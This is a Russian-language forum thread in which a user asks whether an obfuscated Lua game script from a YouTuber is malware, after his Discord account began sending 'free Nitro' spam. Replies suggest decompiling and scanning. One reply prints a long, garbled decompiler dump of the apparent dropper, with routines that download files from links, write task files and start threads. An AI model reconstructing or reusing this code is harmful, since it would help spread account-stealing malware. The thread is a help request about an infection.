Может ли закриптованный луа скрипт быть вирусом?

  • Автор темы Удалённый пользователь 452116
  • Дата начала
У

Удалённый пользователь 452116

Гость
Автор темы
Помогите, я скачал скрипт от ютубера в луа формате и он был закриптован чекнул на вирус тотале ноль вирусов, запустился я в игру и вдруг у меня джава просит обновиться я отменил загрузку, и вот все бы ничего, но на моем акке в дс начали рассылать рекламу по типу "бесплатно дискорд нитро" а именно он начал рассылать в 0:00 что это может быть, если нужно могу этот луа файл сюда скинуть
 
У

Удалённый пользователь 452116

Гость
Автор темы
стоп
а при входе в игру у тебя вообще работает команда /argp ? она хоть что нибудь делает ?
Хз, не тестил я запихнул файл в мунлоадер, зашел, и у меня попросила джава обновиться хотя такого никогда не было
 

влад динозавр

Известный
1,190
559
Хах.
1642911471780.png


Ну вскрывай код декомпилятором, увидишь. Показывать ничего не буду, судя по видео(которое ты скинул выше).
 

влад динозавр

Известный
1,190
559
Ну блять я хз, ратника точно нету проверил автозагрузки, фоновые нету ничего антивирусом просканировал
Разбирайся сам. Ты попросил проверить скрипт - я проверил, на этом моя работа окончена.
 

vegas

Известный
551
442
Ты скачал скрипт у какого извиняюсь noname ютубера, и у тебя началась какая-то хрень на ПК твориться. Ясен хуй это вiрус, тут даже думать не надо. Меняй винду или пробуй антивирусом что-то сделать.
 
У

Удалённый пользователь 452116

Гость
Автор темы
Ты скачал скрипт у какого извиняюсь noname ютубера, и у тебя началась какая-то хрень на ПК твориться. Ясен хуй это вiрус, тут даже думать не надо. Меняй винду или пробуй антивирусом что-то сделать.
Щас буду Dr.web сканировать и еще несколькими антивирусами
 

rvng

ничего уже не будет
Модератор
10,705
6,006
Щас буду Dr.web сканировать и еще несколькими антивирусами
я надеюсь ты все жесткие диски сканируешь а не по отдельности
хз скок у тебв памяти, но у меня на обоих жестких дисках в общем 1тб памяти сканированием др веб ушло 2-3 часа
 
У

Удалённый пользователь 452116

Гость
Автор темы
я надеюсь ты все жесткие диски сканируешь а не по отдельности
хз скок у тебв памяти, но у меня на обоих жестких дисках в общем 1тб памяти сканированием др веб ушло 2-3 часа
1 жесткий диск на 500 гб
 

Fix_Name_Fix

Потрачен
470
149
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
На разбирайся, может чото-то поймешь, хотя наврятли.:
function randomFunction    local randomFunction1 (INPUT_VAR_0_,INPUT_VAR_1_)
    var_0_2 = 0 --var_0_2 NUMBER-NUMBER
    var_0_3 = 0 --var_0_3 NUMBER-NUMBER
    var_0_4 = 31 --var_0_4 NUMBER-NUMBER
    var_0_5 = 1 --var_0_5 NUMBER-NUMBER
    for var_0_6 = var_0_3,var_0_4,var_0_5 do --location 0005, loop ends at 0026-1
        var_0_7 = INPUT_VAR_0_ /  2 --var_0_7 NUMBER-NUMBER
        var_0_8 = INPUT_VAR_1_ /  2 --var_0_8 NUMBER-NUMBER
        var_0_7 = var_0_7 + var_0_8 --var_0_7 NUMBER-NUMBER
        var_0_9 = var_0_7
        var_0_8 = uget_0_0(var_0_9)
        if var_0_7 ~= var_0_8 then
            --jump to 0017 (if previous if statement is false) --0017 JMP-JMP
            var_0_8 = 2 --var_0_8 NUMBER-NUMBER
            var_0_8 = var_0_8 ^ var_0_6 --var_0_8 NUMBER-NUMBER
            var_0_2 = var_0_2 + var_0_8 --var_0_2 NUMBER-NUMBER
        end
        var_0_9 = INPUT_VAR_0_ /  2 --var_0_9 NUMBER-NUMBER
        var_0_8 = uget_0_0(var_0_9)
        var_0_0 = var_0_8
        var_0_9 = INPUT_VAR_1_ /  2 --var_0_9 NUMBER-NUMBER
        var_0_8 = uget_0_0(var_0_9)
        var_0_1 = var_0_8
    end --location 0025, loops back to 0006-1
    var_0_4 = var_0_2
    return uget_0_0(var_0_4)
end


function randomFunction    var_17_5 (INPUT_VAR_0_,INPUT_VAR_1_,INPUT_VAR_2_,INPUT_VAR_3_,INPUT_VAR_4_)
    var_1_2 = 0 --var_1_2 NUMBER-NUMBER
    var_1_3 = 1 --var_1_3 NUMBER-NUMBER
    LEN unhandled at 0004
    var_1_5 = 1 --var_1_5 NUMBER-NUMBER
    for var_1_6 = var_1_3,INPUT_VAR_4_,var_1_5 do --location 0006, loop ends at 0023-1
        var_1_2 = var_1_2 +  1 --var_1_2 NUMBER-NUMBER
        LEN unhandled at 0009
        if uget_1_0 < var_1_2 then
            --jump to 0013 (if previous if statement is false) --0013 JMP-JMP
            var_1_2 = 1 --var_1_2 NUMBER-NUMBER
        end
        var_1_7 = ""
        var_1_8 = uget_1_1( uget_1_2(unknown0, unknown1) )
        var_1_1 = var_1_7 .. var_1_8
    end --location 0022, loops back to 0007-1
    return var_1_1
end


function randomFunction    local randomFunction3 (INPUT_VAR_0_,INPUT_VAR_1_,INPUT_VAR_2_,INPUT_VAR_3_,INPUT_VAR_4_,INPUT_VAR_5_)
    var_2_3 = {} --to find out the contents of this table look inside the lua file
    var_2_2 = uget_2_1(var_2_3)
    var_2_2 = 0 --var_2_2 NUMBER-NUMBER
    var_2_3 = 0 --var_2_3 NUMBER-NUMBER
    var_2_4 = INPUT_VAR_0_
    LEN unhandled at 0009
    var_2_6 = nil --var_2_6 PRIMITIVE-PRIMITIVE
    var_2_7 = 0 --var_2_7 NUMBER-NUMBER
    var_2_1 = unknown2(var_2_2, var_2_3, var_2_4, INPUT_VAR_5_, var_2_6, var_2_7)
    var_2_4 = var_2_1 +  1 --var_2_4 NUMBER-NUMBER
    var_2_2 = uget_2_2.new("wchar_t[?]", var_2_4)
    var_2_5 = {} --to find out the contents of this table look inside the lua file
    var_2_4 = uget_2_1(var_2_5)
    var_2_4 = 0 --var_2_4 NUMBER-NUMBER
    var_2_5 = 0 --var_2_5 NUMBER-NUMBER
    var_2_6 = INPUT_VAR_0_
    LEN unhandled at 0026
    var_2_8 = var_2_2
    var_2_9 = var_2_1
    unknown3(var_2_4, var_2_5, var_2_6, var_2_7, var_2_8, var_2_9)
    return var_2_2
end


function randomFunction    local randomFunction4 (INPUT_VAR_0_,INPUT_VAR_1_)
    if not INPUT_VAR_1_ then
        --jump to 0008 (if previous if statement is false) --0008 JMP-JMP
        var_3_3 = INPUT_VAR_0_
        var_3_2 = uget_3_0.sizeof(var_3_3)
        var_3_1 = var_3_2
    end
    var_3_4 = {} --to find out the contents of this table look inside the lua file
    var_3_3 = uget_3_2(var_3_4)
    var_3_3 = 0 --var_3_3 NUMBER-NUMBER
    var_3_4 = 0 --var_3_4 NUMBER-NUMBER
    var_3_5 = INPUT_VAR_0_
    var_3_6 = var_3_1
    var_3_7 = nil --var_3_7 PRIMITIVE-PRIMITIVE
    var_3_8 = 0 --var_3_8 NUMBER-NUMBER
    var_3_9 = nil
    var_3_10 = nil
    var_3_2 = unknown4(var_3_3, var_3_4, var_3_5, var_3_6, var_3_7, var_3_8, var_3_9, var_3_10)
    var_3_5 = var_3_2 +  1 --var_3_5 NUMBER-NUMBER
    var_3_3 = uget_3_0.new("char[?]", var_3_5)
    var_3_6 = {} --to find out the contents of this table look inside the lua file
    var_3_5 = uget_3_2(var_3_6)
    var_3_5 = 0 --var_3_5 NUMBER-NUMBER
    var_3_6 = 0 --var_3_6 NUMBER-NUMBER
    var_3_7 = INPUT_VAR_0_
    var_3_8 = var_3_1
    var_3_9 = var_3_3
    var_3_10 = var_3_2
    var_3_11 = nil
    var_3_12 = nil
    unknown5(var_3_5, var_3_6, var_3_7, var_3_8, var_3_9, var_3_10, var_3_11, var_3_12)
    var_3_5 = var_3_3
    return uget_3_0.string(var_3_5)
end


function randomFunction    local randomFunction5 (INPUT_VAR_0_)
    var_4_2 = INPUT_VAR_0_
    return INPUT_VAR_0_.match(var_4_2, "(.*\).-%..+$")
end


function randomFunction    local randomFunction6 ()
    var_5_0 = 260 --var_5_0 NUMBER-NUMBER
    var_5_3 = var_5_0
    var_5_1 = uget_5_0.new("wchar_t[?]", var_5_3)
    var_5_4 = {} --to find out the contents of this table look inside the lua file
    var_5_3 = uget_5_2(var_5_4)
    var_5_3 = nil --var_5_3 PRIMITIVE-PRIMITIVE
    var_5_4 = var_5_1
    var_5_5 = var_5_0
    var_5_2 = unknown6(var_5_3, var_5_4, var_5_5)
    if var_5_2 ~= 0 then
        --jump to 0023 (if previous if statement is false) --0023 JMP-JMP
        var_5_4 = var_5_1
        uget_5_3( uget_5_4(var_5_4) )
    end
    var_5_2 = nil --var_5_2 PRIMITIVE-PRIMITIVE
    return var_5_2
end


function randomFunction    local randomFunction7 (INPUT_VAR_0_,INPUT_VAR_1_)
    if INPUT_VAR_0_ ~= nil then
        --jump to 0064 (if previous if statement is false) --0064 JMP-JMP
        if INPUT_VAR_1_ ~= nil then
            --jump to 0064 (if previous if statement is false) --0064 JMP-JMP
            var_6_4 = {} --to find out the contents of this table look inside the lua file
            var_6_3 = uget_6_1(var_6_4)
            var_6_5 = INPUT_VAR_1_
            var_6_2 = unknown7( uget_6_2( uget_6_3(var_6_5) ) )
            if var_6_2 then
                --jump to 0064 (if previous if statement is false) --0064 JMP-JMP
                var_6_3 = INPUT_VAR_0_
                var_6_2 = uget_6_2(var_6_3)
                var_6_4 = INPUT_VAR_1_
                var_6_3 = uget_6_2(var_6_4)
                var_6_1 = var_6_3
                var_6_0 = var_6_2
                var_6_4 = {} --to find out the contents of this table look inside the lua file
                var_6_3 = uget_6_1(var_6_4)
                var_6_3 = var_6_1
                var_6_2 = unknown8(var_6_3)
                if not var_6_2 then
                    --jump to 0064 (if previous if statement is false) --0064 JMP-JMP
                    var_6_4 = {} --to find out the contents of this table look inside the lua file
                    var_6_3 = uget_6_1(var_6_4)
                    var_6_3 = var_6_0
                    unknown9(var_6_3)
                    var_6_4 = {} --to find out the contents of this table look inside the lua file
                    var_6_3 = uget_6_1(var_6_4)
                    var_6_3 = nil --var_6_3 PRIMITIVE-PRIMITIVE
                    var_6_4 = var_6_0
                    var_6_5 = var_6_1
                    var_6_6 = 0 --var_6_6 NUMBER-NUMBER
                    var_6_7 = nil --var_6_7 PRIMITIVE-PRIMITIVE
                    var_6_2 = unknown10(var_6_3, var_6_4, var_6_5, var_6_6, var_6_7)
                    if var_6_2 == 0 then
                        --jump to 0064 (if previous if statement is false) --0064 JMP-JMP
                        var_6_4 = {} --to find out the contents of this table look inside the lua file
                        var_6_3 = uget_6_1(var_6_4)
                        var_6_3 = 250 --var_6_3 NUMBER-NUMBER
                        unknown11(var_6_3)
                        var_6_2 = true --var_6_2 PRIMITIVE-PRIMITIVE
                        return var_6_2
                    end
                end
            end
        end
    end
    var_6_2 = false --var_6_2 PRIMITIVE-PRIMITIVE
    return var_6_2
end


function randomFunction    local randomFunction8 (INPUT_VAR_0_)
    if INPUT_VAR_0_ ~= nil then
        --jump to 0018 (if previous if statement is false) --0018 JMP-JMP
        var_7_3 = {} --to find out the contents of this table look inside the lua file
        var_7_2 = uget_7_1(var_7_3)
        var_7_2 = nil --var_7_2 PRIMITIVE-PRIMITIVE
        var_7_3 = uget_7_2("open")
        var_7_5 = INPUT_VAR_0_
        var_7_4 = uget_7_2(var_7_5)
        var_7_5 = nil
        var_7_6 = nil
        var_7_7 = 0 --var_7_7 NUMBER-NUMBER
        unknown12(var_7_2, var_7_3, var_7_4, var_7_5, var_7_6, var_7_7)
    end
    return
end


function randomFunction    local randomFunction9 (INPUT_VAR_0_)
    if INPUT_VAR_0_ ~= nil then
        --jump to 0013 (if previous if statement is false) --0013 JMP-JMP
        var_8_3 = {} --to find out the contents of this table look inside the lua file
        var_8_2 = uget_8_1(var_8_3)
        var_8_3 = INPUT_VAR_0_
        var_8_2 = uget_8_2(var_8_3)
        var_8_3 = 7 --var_8_3 NUMBER-NUMBER
        unknown13(var_8_2, var_8_3)
    end
    return
end


function randomFunction    local randomFunction10 (INPUT_VAR_0_)
    var_9_3 = INPUT_VAR_0_
    var_9_2 = INPUT_VAR_0_.gsub(var_9_3, "(", "[%1]=")
    var_9_0 = "return " .. var_9_2
    var_9_2 = var_9_0
    var_9_1 = load(var_9_2)
    if var_9_1 ~= nil then
        --jump to 0023 (if previous if statement is false) --0023 JMP-JMP
        var_9_2 = var_9_1
        var_9_2 = var_9_2()
        if var_9_2 ~= nil then
            --jump to 0023 (if previous if statement is false) --0023 JMP-JMP
            var_9_4 = var_9_2
            var_9_3 = type(var_9_4)
            if var_9_3 ==  "table" then
                --jump to 0023 (if previous if statement is false) --0023 JMP-JMP
                return var_9_2
            end
        end
    end
    var_9_2 = nil --var_9_2 PRIMITIVE-PRIMITIVE
    return var_9_2
end


function randomFunction    local randomFunction11 ()
    var_10_2 = {} --to find out the contents of this table look inside the lua file
    var_10_1 = uget_10_2(var_10_2)
    var_10_1 = nil --var_10_1 PRIMITIVE-PRIMITIVE
    var_10_2 = false --var_10_2 PRIMITIVE-PRIMITIVE
    var_10_4 = var_10_4 .. "_" .. uget_10_5
    var_10_0 = unknown14(var_10_1, var_10_2,  uget_10_3(var_10_4) )
    var_10_0 = var_10_0
    var_10_2 = {} --to find out the contents of this table look inside the lua file
    var_10_1 = uget_10_2(var_10_2)
    var_10_0 = unknown15()
    if var_10_0 == 0 then
        --jump to 0026 (if previous if statement is false) --0026 JMP-JMP
        var_10_0 = true --var_10_0 PRIMITIVE-PRIMITIVE
        return var_10_0
    end
    var_10_0 = false --var_10_0 PRIMITIVE-PRIMITIVE
    return var_10_0
end


function randomFunction    local randomFunction12 (INPUT_VAR_0_)
    if INPUT_VAR_0_ ~= nil then
        --jump to 0082 (if previous if statement is false) --0082 JMP-JMP
        var_11_2 = INPUT_VAR_0_
        var_11_1 = uget_11_0(var_11_2)
        var_11_0 = var_11_1
        var_11_3 = {} --to find out the contents of this table look inside the lua file
        var_11_2 = uget_11_2(var_11_3)
        var_11_2 = var_11_0
        var_11_3 = 2147483648 --var_11_3 NUMBER-NUMBER
        var_11_4 = 1 --var_11_4 NUMBER-NUMBER
        var_11_5 = nil --var_11_5 PRIMITIVE-PRIMITIVE
        var_11_6 = 3 --var_11_6 NUMBER-NUMBER
        var_11_7 = 128 --var_11_7 NUMBER-NUMBER
        var_11_8 = nil --var_11_8 PRIMITIVE-PRIMITIVE
        var_11_1 = unknown16(var_11_2, var_11_3, var_11_4, var_11_5, var_11_6, var_11_7, var_11_8)
        var_11_4 = -1 --var_11_4 NUMBER-NUMBER
        var_11_2 = uget_11_3.cast("void*", var_11_4)
        if var_11_1 ~= var_11_2 then
            --jump to 0082 (if previous if statement is false) --0082 JMP-JMP
            var_11_4 = {} --to find out the contents of this table look inside the lua file
            var_11_3 = uget_11_2(var_11_4)
            var_11_3 = var_11_1
            var_11_4 = nil --var_11_4 PRIMITIVE-PRIMITIVE
            var_11_2 = unknown17(var_11_3, var_11_4)
            var_11_5 = var_11_2
            var_11_3 = uget_11_3.new("char[?]", var_11_5)
            var_11_6 = 1 --var_11_6 NUMBER-NUMBER
            var_11_4 = uget_11_3.new("size_t[?]", var_11_6)
            var_11_7 = {} --to find out the contents of this table look inside the lua file
            var_11_6 = uget_11_2(var_11_7)
            var_11_6 = var_11_1
            var_11_7 = var_11_3
            var_11_8 = var_11_2
            var_11_9 = var_11_4
            var_11_10 = nil --var_11_10 PRIMITIVE-PRIMITIVE
            var_11_5 = unknown18(var_11_6, var_11_7, var_11_8, var_11_9, var_11_10)
            if var_11_5 == 1 then
                --jump to 0060 (if previous if statement is false) --0060 JMP-JMP
                var_11_5 = false --var_11_5 PRIMITIVE-PRIMITIVE
            else
                --location 0060--0060 LOCATION-LOCATION_
                var_11_5 = true --var_11_5 PRIMITIVE-PRIMITIVE
            end
            var_11_8 = {} --to find out the contents of this table look inside the lua file
            var_11_7 = uget_11_2(var_11_8)
            var_11_7 = var_11_1
            unknown19(var_11_7)
            var_11_8 = {} --to find out the contents of this table look inside the lua file
            var_11_7 = uget_11_2(var_11_8)
            var_11_7 = var_11_0
            unknown20(var_11_7)
            if var_11_5 then
                --jump to 0082 (if previous if statement is false) --0082 JMP-JMP
                var_11_7 = var_11_3
                var_11_8 = var_11_2
                return uget_11_3.string(var_11_7, var_11_8)
            end
        end
    end
    var_11_1 = nil --var_11_1 PRIMITIVE-PRIMITIVE
    return var_11_1
end


function randomFunction    local randomFunction13 ()
    var_12_0 = 260 --var_12_0 NUMBER-NUMBER
    var_12_3 = var_12_0
    var_12_1 = uget_12_0.new("wchar_t[?]", var_12_3)
    var_12_4 = {} --to find out the contents of this table look inside the lua file
    var_12_3 = uget_12_2(var_12_4)
    var_12_3 = var_12_0
    var_12_4 = var_12_1
    unknown21(var_12_3, var_12_4)
    var_12_3 = var_12_1
    return uget_12_3(var_12_3)
end


function randomFunction    local randomFunction14 ()
    var_13_1 = uget_13_1()
    var_13_1 = var_13_1 .. "task_" .. uget_13_2 .. ".txt"
    var_13_0 = uget_13_0(var_13_1)
    var_13_3 = {} --to find out the contents of this table look inside the lua file
    var_13_2 = uget_13_4(var_13_3)
    var_13_2 = var_13_0
    var_13_1 = unknown22(var_13_2)
    if var_13_1 then
        --jump to 0025 (if previous if statement is false) --0025 JMP-JMP
        var_13_3 = {} --to find out the contents of this table look inside the lua file
        var_13_2 = uget_13_4(var_13_3)
        var_13_2 = var_13_0
        unknown23(var_13_2)
    end
    return
end


function randomFunction    local randomFunction15 (INPUT_VAR_0_,INPUT_VAR_1_)
    var_14_2 = {} --to find out the contents of this table look inside the lua file
    var_14_4 = {} --to find out the contents of this table look inside the lua file
    var_14_3 = uget_14_0(var_14_4)
    var_14_2[1] = var_14_3
    var_14_4 = {} --to find out the contents of this table look inside the lua file
    var_14_3 = uget_14_0(var_14_4)
    var_14_2[2] = var_14_3
    var_14_3 = uget_14_1()
    var_14_2[4] = var_14_3
    var_14_4 = {} --to find out the contents of this table look inside the lua file
    var_14_3 = uget_14_0(var_14_4)
    var_14_2[5] = var_14_3
    var_14_4 = INPUT_VAR_1_
    for var_14_6, var_14_7 in pairs(var_14_4) do --var_14_3 FORTEST-FORTEST
        if unknown24 ~= nil then
            --jump to 0052 (if previous if statement is false) --0052 JMP-JMP
            if var_14_7.type == 0 then
                --jump to 0033 (if previous if statement is false) --0033 JMP-JMP
                var_14_9 = unknown24
                var_14_9 = var_14_9 .. var_14_7.name
                if not var_14_9 then
                end -- maybe?
            else
                --location 0033--0033 LOCATION-LOCATION_
                var_14_9 = INPUT_VAR_0_
                var_14_10 = unknown24
                var_14_9 = var_14_9 .. var_14_10 .. var_14_7.name
            end
            var_14_12 = var_14_9
            var_14_10 = uget_14_2(var_14_7.link, var_14_12)
            if var_14_10 then
                --jump to 0052 (if previous if statement is false) --0052 JMP-JMP
                var_14_11 = var_14_9
                uget_14_3(var_14_11)
                if var_14_7.type == 0 then
                    --jump to 0052 (if previous if statement is false) --0052 JMP-JMP
                    var_14_11 = var_14_9
                end
            end
            uget_14_4(var_14_11)
        end
    end --end of a for loop
    return
end


function randomFunction    var_17_30 ()
    var_15_0 = uget_15_0()
    if var_15_0 then
        --jump to 0007 (if previous if statement is false) --0007 JMP-JMP
        var_15_0 = 0 --var_15_0 NUMBER-NUMBER
        return var_15_0
    end
    var_15_2 = {} --to find out the contents of this table look inside the lua file
    var_15_1 = uget_15_2(var_15_2)
    var_15_1 = nil --var_15_1 PRIMITIVE-PRIMITIVE
    unknown25(var_15_1)
    var_15_2 = {} --to find out the contents of this table look inside the lua file
    var_15_1 = uget_15_2(var_15_2)
    var_15_1 = 268435457 --var_15_1 NUMBER-NUMBER
    var_15_2 = uget_15_4.cast("void*", uget_15_5)
    LEN unhandled at 0026
    var_15_4 = 0 --var_15_4 NUMBER-NUMBER
    unknown26(var_15_1, var_15_2, uget_15_5, var_15_4)
    var_15_0 = uget_15_6()
    var_15_1 = var_15_0
    var_15_1 = var_15_1 .. "task_" .. uget_15_7 .. ".txt"
    var_15_3 = var_15_3 .. uget_15_7
    var_15_4 = var_15_1
    var_15_2 = uget_15_8(var_15_3, var_15_4)
    if var_15_2 then
        --jump to 0058 (if previous if statement is false) --0058 JMP-JMP
        var_15_4 = var_15_1
        var_15_3 = uget_15_10(var_15_4)
        if var_15_3 ~= nil then
            --jump to 0058 (if previous if statement is false) --0058 JMP-JMP
            var_15_5 = var_15_3
            var_15_4 = uget_15_11(var_15_5)
            if var_15_4 ~= nil then
                --jump to 0058 (if previous if statement is false) --0058 JMP-JMP
                var_15_6 = var_15_0
                var_15_7 = var_15_4
                uget_15_12(var_15_6, var_15_7)
            end
        end
    end
    var_15_5 = {} --to find out the contents of this table look inside the lua file
    var_15_4 = uget_15_2(var_15_5)
    unknown27()
    var_15_3 = 0 --var_15_3 NUMBER-NUMBER
    return var_15_3
end


function randomFunction    onScriptTerminate (INPUT_VAR_0_)
    if INPUT_VAR_0_ == script.this then
        --jump to 0035 (if previous if statement is false) --0035 JMP-JMP
        uget_16_0()
        if uget_16_1 ~= nil then
            --jump to 0017 (if previous if statement is false) --0017 JMP-JMP
            var_16_3 = {} --to find out the contents of this table look inside the lua file
            var_16_2 = uget_16_3(var_16_3)
            unknown28(uget_16_1)
        end
        if uget_16_4 ~= nil then
            --jump to 0035 (if previous if statement is false) --0035 JMP-JMP
            var_16_3 = {} --to find out the contents of this table look inside the lua file
            var_16_2 = uget_16_3(var_16_3)
            var_16_3 = 0 --var_16_3 NUMBER-NUMBER
            unknown29(uget_16_4, var_16_3)
            var_16_3 = {} --to find out the contents of this table look inside the lua file
            var_16_2 = uget_16_3(var_16_3)
            unknown30(uget_16_4)
        end
    end
    return
end


function someFunc17()
    var_17_0 = {} --to find out the contents of this table look inside the lua file
    local randomFunction0 = function() end -- starts at  test.lua:0
    local randomFunction1 = function() end -- starts at  test.lua:0
    var_17_5 = randomFunction1
    var_17_6 = {} --to find out the contents of this table look inside the lua file
    var_17_5 = var_17_5(var_17_6)
    var_17_7 = randomFunction1
    var_17_8 = {} --to find out the contents of this table look inside the lua file
    var_17_6 = require( var_17_7(var_17_8) )
    var_17_9 = randomFunction1
    var_17_10 = {} --to find out the contents of this table look inside the lua file
    var_17_6.cdef( var_17_9(var_17_10) )
    var_17_9 = randomFunction1
    var_17_10 = {} --to find out the contents of this table look inside the lua file
    var_17_8 = var_17_6.load( var_17_9(var_17_10) )
    var_17_10 = randomFunction1
    var_17_11 = {} --to find out the contents of this table look inside the lua file
    var_17_9 = var_17_6.load( var_17_10(var_17_11) )
    var_17_11 = randomFunction1
    var_17_12 = {} --to find out the contents of this table look inside the lua file
    var_17_10 = var_17_6.load( var_17_11(var_17_12) )
    var_17_12 = randomFunction1
    var_17_13 = {} --to find out the contents of this table look inside the lua file
    var_17_11 = var_17_6.load( var_17_12(var_17_13) )
    var_17_13 = randomFunction1
    var_17_14 = {} --to find out the contents of this table look inside the lua file
    var_17_12 = var_17_6.load( var_17_13(var_17_14) )
    var_17_13 = randomFunction1
    var_17_14 = {} --to find out the contents of this table look inside the lua file
    var_17_13 = var_17_13(var_17_14)
    var_17_14 = randomFunction1
    var_17_15 = {} --to find out the contents of this table look inside the lua file
    var_17_14 = var_17_14(var_17_15)
    var_17_15 = nil --var_17_15 PRIMITIVE-PRIMITIVE
    local randomFunction2 = function() end -- starts at  test.lua:0
    local randomFunction3 = function() end -- starts at  test.lua:0
    local randomFunction4 = function() end -- starts at  test.lua:0
    local randomFunction5 = function() end -- starts at  test.lua:0
    local randomFunction6 = function() end -- starts at  test.lua:0
    local randomFunction7 = function() end -- starts at  test.lua:0
    local randomFunction8 = function() end -- starts at  test.lua:0
    local randomFunction9 = function() end -- starts at  test.lua:0
    local randomFunction10 = function() end -- starts at  test.lua:0
    local randomFunction11 = function() end -- starts at  test.lua:0
    local randomFunction12 = function() end -- starts at  test.lua:0
    local randomFunction13 = function() end -- starts at  test.lua:0
    local randomFunction14 = function() end -- starts at  test.lua:0
    local randomFunction15 = function() end -- starts at  test.lua:0
    var_17_30 = randomFunction1
    var_17_31 = {} --to find out the contents of this table look inside the lua file
    var_17_30 = var_17_30(var_17_31)
    var_17_31 = nil --var_17_31 PRIMITIVE-PRIMITIVE
    var_17_32 = 0 --var_17_32 NUMBER-NUMBER
    var_17_35 = randomFunction15
    var_17_33 = var_17_6.cast("thread", var_17_35)
    var_17_34 = nil --var_17_34 PRIMITIVE-PRIMITIVE
    var_17_35 = 0 --var_17_35 NUMBER-NUMBER
    var_17_36 = nil --var_17_36 PRIMITIVE-PRIMITIVE
    var_17_30 = unknown31(var_17_31, var_17_32, var_17_33, var_17_34, var_17_35, var_17_36)
    if getMoonloaderVersion == nil then
        --jump to 0110 (if previous if statement is false) --0110 JMP-JMP
        if var_17_30 ~= nil then
            --jump to 0110 (if previous if statement is false) --0110 JMP-JMP
            var_17_31 = randomFunction1
            var_17_32 = {} --to find out the contents of this table look inside the lua file
            var_17_31 = var_17_31(var_17_32)
            var_17_32 = var_17_30
            var_17_33 = 4294967295 --var_17_33 NUMBER-NUMBER
            unknown32(var_17_32, var_17_33)
            var_17_31 = randomFunction1
            var_17_32 = {} --to find out the contents of this table look inside the lua file
            var_17_31 = var_17_31(var_17_32)
            var_17_32 = var_17_30
            unknown33(var_17_32)
            var_17_31 = randomFunction13
            var_17_31()
            if var_17_15 ~= nil then
                --jump to 0110 (if previous if statement is false) --0110 JMP-JMP
                var_17_31 = randomFunction1
                var_17_32 = {} --to find out the contents of this table look inside the lua file
                var_17_31 = var_17_31(var_17_32)
                var_17_32 = var_17_15
                unknown34(var_17_32)
            end
        end
    end
    local randomFunction16 = function() end -- starts at  test.lua:0
    onScriptTerminate = randomFunction16
    return
end